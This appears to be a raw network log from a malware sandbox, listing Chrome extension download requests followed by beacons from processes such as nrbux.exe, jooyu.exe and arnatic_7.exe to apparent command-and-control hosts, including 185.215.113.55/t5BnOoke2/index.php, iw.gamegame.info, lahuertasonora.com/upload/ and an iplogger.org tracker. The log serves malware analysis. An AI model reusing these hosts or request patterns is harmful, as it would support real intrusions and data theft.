                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77025
                                                                                                                                                                                        content-range: bytes 3539890-4161646/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=4161647-4904234
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 742588
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77025
                                                                                                                                                                                        content-range: bytes 4161647-4904234/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=4904235-5516805
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 612571
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77027
                                                                                                                                                                                        content-range: bytes 4904235-5516805/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=5516806-5991422
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 474617
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77028
                                                                                                                                                                                        content-range: bytes 5516806-5991422/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=5991423-6466352
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 474930
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77029
                                                                                                                                                                                        content-range: bytes 5991423-6466352/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=6466353-6731810
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 265458
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77030
                                                                                                                                                                                        content-range: bytes 6466353-6731810/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=6731811-6760941
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 29131
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77031
                                                                                                                                                                                        content-range: bytes 6731811-6760941/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 209
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ad3a6100002f2c2fa2f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Q4rFbFvf%2Bai5zJ0VS09LgFTsZaDxONGfz5h0hFSkkZQiNLefqz%2F4xWjpsd7YPfK4H9HRYPljtpvFZzynbZTHtZjZJptNyL8WH9RH6eFgdDewBa%2BkkWZfeLjYRGMUqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617d70e732f2c-ORD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /18hh57 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:16 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=57d6n1rga1sc8e4q7jcjr3avo6; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.79.72.176; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837955; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 1
                                                                                                                                                                                        whoami: afc45862ad0365903c902b507e8c40ea0e2e1ac2206a1305c4706af0b786dc86
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 155
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:15 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 327
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:17 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 235
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iecvlist.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iecvlist.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iecvlist.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        ie9comview.vo.msecnd.net
                                                                                                                                                                                        ie9comview.vo.msecnd.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        cs9.wpc.v0cdn.net
                                                                                                                                                                                        cs9.wpc.v0cdn.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        152.199.19.161
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55//t5BnOoke2/index.php
                                                                                                                                                                                        rundll32.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST //t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 21
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Refresh: 1; url = login.php
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:34 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ad8c6a00001e611f3b3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0hB8MhhXSI67Abx5r5Ybr6XkKUeCDxXfpMGMXZfPWp%2BDdfuZiVcpkkgwGJimlkboiFEZijAWYOUb%2B1xWkqtjyEEbDCNTrntZDXEK%2F9OWBsTEGM9prb4EhvsX9op8AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686185a4dc61e61-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
